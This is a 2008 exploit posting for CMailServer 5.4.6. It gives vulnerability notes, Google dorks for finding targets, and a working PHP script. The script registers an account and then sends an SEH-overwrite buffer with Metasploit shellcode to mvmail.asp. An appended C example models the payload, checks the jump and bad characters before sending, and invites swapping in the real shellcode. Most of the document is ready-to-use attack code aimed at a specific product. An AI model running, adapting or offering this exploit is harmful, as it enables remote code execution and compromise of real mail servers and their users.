# Title : CMailServer 5.4.6 (CMailCOM.dll) Remote SEH Overwrite Exploit
# Published : 2008-07-06
# Author : Nine:Situations:Group
<?php
/*
CMailServer 5.4.6 mvmail.asp/CMailCOM.dll remote seh overwrite
proof of concept exploit
by Nine:Situations:Group::bruiser
our site: http://retrogod.altervista.org/
software site: http://www.youngzsoft.net/cmailserver/
Google dorks:
intitle:"Mail Server CMailServer WebMail"
intitle:"Mail Server CMailServer WebMail 5.4.6"
Some notes:
This server provides an IIS webmail interface and registers a COM
component vulnerable to multiple buffer overflows; among others, the
CMailCOM.POP3 class with CLSID 6971D9B8-B53E-4C25-A414-76199768A592.
This class is instantiated by various ASP scripts inside the main folder.
I found this clear vector in mvmail.asp, lines 25-35:
...
Set objPOP3 = CreateObject("CMailCOM.POP3.1")
objPOP3.Login Session("User"), Session("Pass")
Session("LoginSuccess") = objPOP3.LoginSuccess
If Session("LoginSuccess") = 1 Then
set rs=Server.createobject("adodb.recordset")
rs.open "mailfolder",Conn,1,3
i = 0
arrString = Split(Request("indexOfMail"), ";", -1, 1)
While Len(arrString(i)) <> 0
strUID = arrString(i)
objPOP3.MoveToFolder strUID ' <---------------- bof
...
By attaching olly to the w3wp.exe sub-process you will see the usual
dump with ecx and eip owned, with a buffer of approximately 13000 chars.
Exploitation is post-auth, but you can get a user account simply by
registering through the signup.asp page, which is enabled by default.
Calc.exe will run with NETWORK SERVICE privilege; check the task list.
Note that 4-5 failed exploit attempts may leave IIS returning a
"Service Unavailable" message.
Other attacks are possible, see a list of locally overflowable
methods:
CreateUserPath, Logout, DeleteMailByUID, MoveToInbox, MoveToFolder,
DeleteMailEx, GetMailDataEx, SetReplySign, SetForwardSign, SetReadSign.
Note also that remotely there is some validation (e.g. you cannot have
a username longer than 4000 chars, which could otherwise be used to
overflow the CreateUserPath method, and you cannot overflow through
the strUID argument), which reduces the remote vectors a lot. However,
as you can see, there is no filter on the "indexOfMail" one.
Other notes:
CMailCOM.SMTP class with CLSID 0609792F-AB56-4CB6-8909-19CDF72CB2A0
is also vulnerable in the following methods:
AddAttach, SetSubject, SetBcc, SetBody, SetCc, SetFrom,
SetTo, SetFromUID
*/
error_reporting(7);
$host = $argv[1];
$path = isset($argv[2]) ? $argv[2] : "";
$port = isset($argv[3]) ? (int) $argv[3] : 80;
print("CMailServer 5.4.6 mvmail.asp/CMailCOM.dll remote seh overwrite\n".
      "exploit\n".
      "by Nine:Situations:Group::bookoo\n");
$path ? print("attackin'...\n") : die("syntax: php ".$argv[0]." [host] [path] [[port]]\n".
      "example: php ".$argv[0]." 192.168.0.1 /mail/ \n".
      "   ''    php ".$argv[0]." 192.168.0.1 / 81 \n");
$url = "http://$host:$port";
$win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN');
// load the curl extension if it is not already there (dl() only works from the CLI)
if (!extension_loaded("curl")) {
    $win ? dl("php_curl.dll") : dl("php_curl.so");
}
// borrowed from bookoo
// $packet is a complete raw HTTP request (request line, headers, blank line, body);
// it is handed to curl as the "custom request", so curl sends it as-is to $url.
function send($packet, $out) {
    global $url, $data;
    if (!extension_loaded("curl")) {
        die("you need the curl extension loaded to run...");
    }
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 5);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $packet);
    $data = curl_exec($ch);
    if (curl_errno($ch)) {
        print curl_error($ch)."\n";
    }
    curl_close($ch);
    if ($out) print($data."\n");
}
$agent = "Mozilla/5.0 (Windows; U; Windows NT 5.2; it; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15";
// subscribe: signup.asp is open by default, so register a throwaway account
$usr = "bookoo"; $pwd = "password"; // new user username & password, change
$d = "Signup=1&Account=$usr&Pass=$pwd&RePass=$pwd&UserName=&Comment=User&POP3Mail=%40ieqowieoqw.com";
$h = "POST ".$path."signup.asp HTTP/1.0\r\nHost: $host\r\nUser-Agent: $agent\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($d)."\r\nConnection: Close\r\n\r\n$d";
send($h, 0);
// pick the ASPSESSIONID cookie out of the Set-Cookie headers of the reply
$tmp = explode("Set-Cookie: ", $data);
$sess = "";
for ($i = 1; $i < count($tmp); $i++) {
    $tmpi = explode(" ", $tmp[$i]);
    $sess = $tmpi[0];
    if (strpos($sess, "ASPSESSIONID") !== false) break;
    echo $sess."\n";
}
// login
$d = "User=$usr&Pass=$pwd&SaveUserPass=on";
$h = "POST ".$path."login.asp HTTP/1.0\r\nHost: $host\r\nUser-Agent: $agent\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($d)."\r\nCookie: $sess SaveUserPass=1; Pass=$pwd; User=$usr;\r\nConnection: Close\r\n\r\n$d";
send($h, 0);
//attack
// bad chars: \x3b \x2f  (';' is the separator mvmail.asp splits indexOfMail on)
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=Pex http://metasploit.com
$shellcode =
"\x2b\xc9\x83\xe9\xde\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xcf".
"\x67\x5f\x11\x83\xee\xfc\xe2\xf4\x33\x8f\x1b\x11\xcf\x67\xd4\x54".
"\xf3\xec\x23\x14\xb7\x66\xb0\x9a\x80\x7f\xd4\x4e\xef\x66\xb4\x58".
"\x44\x53\xd4\x10\x21\x56\x9f\x88\x63\xe3\x9f\x65\xc8\xa6\x95\x1c".
"\xce\xa5\xb4\xe5\xf4\x33\x7b\x15\xba\x82\xd4\x4e\xeb\x66\xb4\x77".
"\x44\x6b\x14\x9a\x90\x7b\x5e\xfa\x44\x7b\xd4\x10\x24\xee\x03\x35".
"\xcb\xa4\x6e\xd1\xab\xec\x1f\x21\x4a\xa7\x27\x1d\x44\x27\x53\x9a".
"\xbf\x7b\xf2\x9a\xa7\x6f\xb4\x18\x44\xe7\xef\x11\xcf\x67\xd4\x79".
"\xf3\x38\x6e\xe7\xaf\x31\xd6\xe9\x4c\xa7\x24\x41\xa7\x97\xd5\x15".
"\x90\x0f\xc7\xef\x45\x69\x08\xee\x28\x04\x3e\x7d\xac\x67\x5f\x11";
$jmp_short = "\xeb\x10\x90\x90";  // overwrites the "next SEH" pointer: jmp short +0x10 over the handler into the nops
$seh = "\xf1\xda\x02\x10";        # 0x1002DAF1 cmailcom.dll / pop ecx - pop - ret
$nop = str_repeat("\x90", 12648);  // sled up to the SEH record (buffer of ~13000 chars)
$bof = $nop . $jmp_short . $seh . str_repeat("\x90", 24) . $shellcode;
$d = "sel=aaaa&ToFolder=4&indexOfMail=".urlencode($bof)."&mailcount=1&pages=";
$h = "POST ".$path."mvmail.asp HTTP/1.0\r\nHost: $host\r\nUser-Agent: $agent\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($d)."\r\nCookie: $sess SaveUserPass=1; Pass=$pwd; User=$usr;\r\nConnection: Close\r\n\r\n$d";
send($h, 1);
?>
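Added example, not part of the original exploit and not Nine:Situations:Group's code: a C model of the SEH payload the PHP above assembles, with the two pre-flight checks worth running before anything is sent. The nSEH slot holds a short jump whose displacement must land inside the NOP run that follows the handler pointer and precedes the shellcode, and no byte of the finished buffer may be one of the bad chars noted above (0x3b, because mvmail.asp splits indexOfMail on ';', and 0x2f). The 12648-byte pad, the 24 trailing NOPs and the pop/pop/ret address 0x1002DAF1 are taken from the PHP; the eight-byte int3 shellcode is a constructed placeholder standing in for the 160-byte calc payload, and the function names are assumptions of this example.

```c
/* Added example: models the SEH-overwrite buffer built by the PHP exploit above
 * and checks (a) that the short jump in the nSEH slot lands in the NOP pad before
 * the shellcode and (b) that the finished buffer contains no bad chars.
 * Placeholder shellcode (int3s) is constructed for this example; pad length and
 * handler address are the ones used on the page. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PAD_LEN       12648u       /* NOP sled before the SEH record (from the PHP) */
#define PPR_ADDR      0x1002DAF1u  /* pop ecx / pop / ret in cmailcom.dll (from the page) */
#define POST_SEH_NOPS 24u          /* NOPs between the handler pointer and the shellcode */

/* Constructed placeholder: eight int3s instead of the 160-byte calc payload. */
static const uint8_t kPlaceholderSc[] = {0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc};

/* Bytes the advisory says cannot be sent in indexOfMail: ';' and '/'. */
static const uint8_t kBadChars[] = {0x3b, 0x2f};

static uint8_t g_payload[PAD_LEN + 8 + POST_SEH_NOPS + sizeof kPlaceholderSc];

/* Layout: [pad x 0x90][nSEH: eb <disp> 90 90][SEH: handler, little-endian]
 *         [24 x 0x90][shellcode].  Returns bytes written, 0 if out is too small. */
size_t build_seh_payload(size_t pad, uint8_t jmp_disp, uint32_t handler,
                         const uint8_t *sc, size_t sclen, uint8_t *out, size_t outlen)
{
    size_t need = pad + 4 + 4 + POST_SEH_NOPS + sclen, off = 0;
    if (outlen < need) return 0;
    memset(out, 0x90, pad);                  off += pad;
    out[off++] = 0xeb; out[off++] = jmp_disp; /* jmp short, forward displacement */
    out[off++] = 0x90; out[off++] = 0x90;
    for (int i = 0; i < 4; i++)              /* handler pointer, little-endian */
        out[off++] = (uint8_t)(handler >> (8 * i));
    memset(out + off, 0x90, POST_SEH_NOPS);  off += POST_SEH_NOPS;
    memcpy(out + off, sc, sclen);            off += sclen;
    return off;
}

/* After pop/pop/ret the ret lands on the nSEH slot, so "jmp short disp" executes
 * from nseh+2.  Returns 1 if the target is inside the NOP run between the handler
 * and the shellcode, 0 if it would hit the handler bytes or overshoot the sled. */
int jmp_landing_ok(size_t pad, uint8_t jmp_disp)
{
    size_t nseh = pad, land = nseh + 2 + jmp_disp;
    size_t nops_start = nseh + 8, sc_start = nops_start + POST_SEH_NOPS;
    return land >= nops_start && land < sc_start;
}

/* Index of the first byte of buf that is in kBadChars, or -1 if the buffer is clean. */
long find_bad_char(const uint8_t *buf, size_t len)
{
    for (size_t i = 0; i < len; i++)
        for (size_t j = 0; j < sizeof kBadChars; j++)
            if (buf[i] == kBadChars[j]) return (long)i;
    return -1;
}

/* Same check for a C string, e.g. any other form field value. */
long first_bad_char_in(const char *s)
{
    return find_bad_char((const uint8_t *)s, strlen(s));
}

/* Builds the payload with the page's parameters and runs both checks.
 * Returns the payload length, or 0 if either check fails. */
size_t checked_payload_len(void)
{
    size_t n = build_seh_payload(PAD_LEN, 0x10, PPR_ADDR, kPlaceholderSc,
                                 sizeof kPlaceholderSc, g_payload, sizeof g_payload);
    if (n == 0 || !jmp_landing_ok(PAD_LEN, 0x10) || find_bad_char(g_payload, n) != -1)
        return 0;
    return n;
}

int main(void)
{
    size_t n = checked_payload_len();
    printf("payload: %zu bytes, nSEH at %u, handler at %u, shellcode at %u, checks %s\n",
           n, PAD_LEN, PAD_LEN + 4, PAD_LEN + 8 + POST_SEH_NOPS, n ? "passed" : "FAILED");
    return n ? 0 : 1;
}
```

Build with any C99 compiler and run it; it prints the offsets of the SEH record and whether both checks passed. Swapping the page's 160-byte shellcode in for the placeholder, or adding a byte to kBadChars, is a one-line change, and the checks then tell you before a single request goes out whether the jump still lands in the pad and whether the encoder really avoided the separator.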
# www.Syue.com [2008-07-06]